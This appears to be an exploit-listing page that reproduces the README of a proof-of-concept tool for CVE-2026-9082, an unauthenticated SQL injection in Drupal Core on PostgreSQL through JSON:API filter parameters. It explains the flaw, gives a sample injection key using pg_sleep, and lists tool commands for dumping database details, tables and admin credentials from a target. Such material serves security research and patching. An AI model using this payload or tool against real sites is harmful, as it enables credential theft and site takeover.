Share
## https://sploitus.com/exploit?id=89259320-7066-518A-B075-CE8CD77E926F
CVE-2026-9082 โ€” Drupal Core PostgreSQL SQL Injection PoC


  




๐Ÿ” Overview


  This repository provides an ethical Proof-of-Concept (PoC) for
  CVE-2026-9082, a Highly Critical SQL injection
  vulnerability in Drupal Core affecting all PostgreSQL-backed
  sites running Drupal 8.0 through 11.3.9.


  The flaw resides in the PostgreSQL Entity Query Condition handler and can be
  exploited by anonymous (unauthenticated) users through the
  JSON:API module, which is enabled by default since Drupal 9.


  Official advisory:
  SA-CORE-2026-004




โš ๏ธ Vulnerability Summary


  Drupal Core includes a database abstraction API designed to sanitize queries
  and prevent SQL injection. A flaw in the PostgreSQL-specific Entity Query
  Condition class (core/modules/pgsql/src/EntityQuery/Condition.php)
  allows an attacker to inject arbitrary SQL through user-controlled
  array keys passed via JSON:API filter parameters.



  CVE ID: CVE-2026-9082
  Advisory: SA-CORE-2026-004
  Affected Software: Drupal Core
  Affected Versions: 8.0.0 โ€“ 11.3.9 (PostgreSQL backend only)
  Fixed in: 11.3.10, 11.2.12, 10.6.9, 10.5.10
  Severity: Highly Critical โ€” 20/25 on Drupal risk scale
  Authentication: None required (anonymous)
  Impact: Data exfiltration, privilege escalation, RCE in some configurations
  Attack vector: HTTP โ€” JSON:API filter condition array keys


How it works

  
    The translateCondition() method in the PostgreSQL Condition
    class iterates over $condition['value'] and uses the
    array keys to construct PDO placeholder names:
    $where_id = $where_prefix . $key;
  
  
    JSON:API allows anonymous users to supply filter values with
    arbitrary array keys via URL parameters:
    filter[x][condition][value][MALICIOUS_KEY]=val
  
  
    PDO named placeholders only consist of [a-zA-Z0-9_]
    characters. When the key contains ), PDO stops parsing the
    placeholder name โ€” everything after becomes literal SQL
    injected into the query.
  
  
    By sending a key like 1))/**/OR/**/(SELECT pg_sleep(5)) IS NOT NULL)--,
    the attacker closes the IN() clause and appends arbitrary SQL,
    while the binding for :prefix_1 is satisfied by a legitimate
    key 1 in the same request.
  




๐Ÿ”– References & Credit


  Advisory: SA-CORE-2026-004
  Patch commit: ea9524d9
  Discoverer: michaelmaturi (credited in the advisory)




โš–๏ธ Legal Notice


  This tool is intended for authorized security testing, educational
  purposes, and ethical research only. Unauthorized access to computer systems
  is illegal.




๐Ÿš€ Installation

git clone https://github.com/7h30th3r0n3/CVE-2026-9082-Drupal-PoC.git
cd CVE-2026-9082-Drupal-PoC
pip install requests rich

โšก Usage (CLI)

# Check if target is vulnerable
python3 CVE-2026-9082.py -u https://target.com --check

# Extract PostgreSQL version
python3 CVE-2026-9082.py -u https://target.com --version

# Extract database info (user + db name)
python3 CVE-2026-9082.py -u https://target.com --dbinfo

# Extract Drupal admin credentials (uid=1)
python3 CVE-2026-9082.py -u https://target.com --admin

# List database tables
python3 CVE-2026-9082.py -u https://target.com --tables

# Custom SQL query extraction
python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user"

# Use boolean-based extraction (faster but less reliable)
python3 CVE-2026-9082.py -u https://target.com --version -m bool

# Interactive mode (no arguments)
python3 CVE-2026-9082.py



๐Ÿ” Author


  PoC developed by 7h30th3r0n3
  Vulnerability discovered by michaelmaturi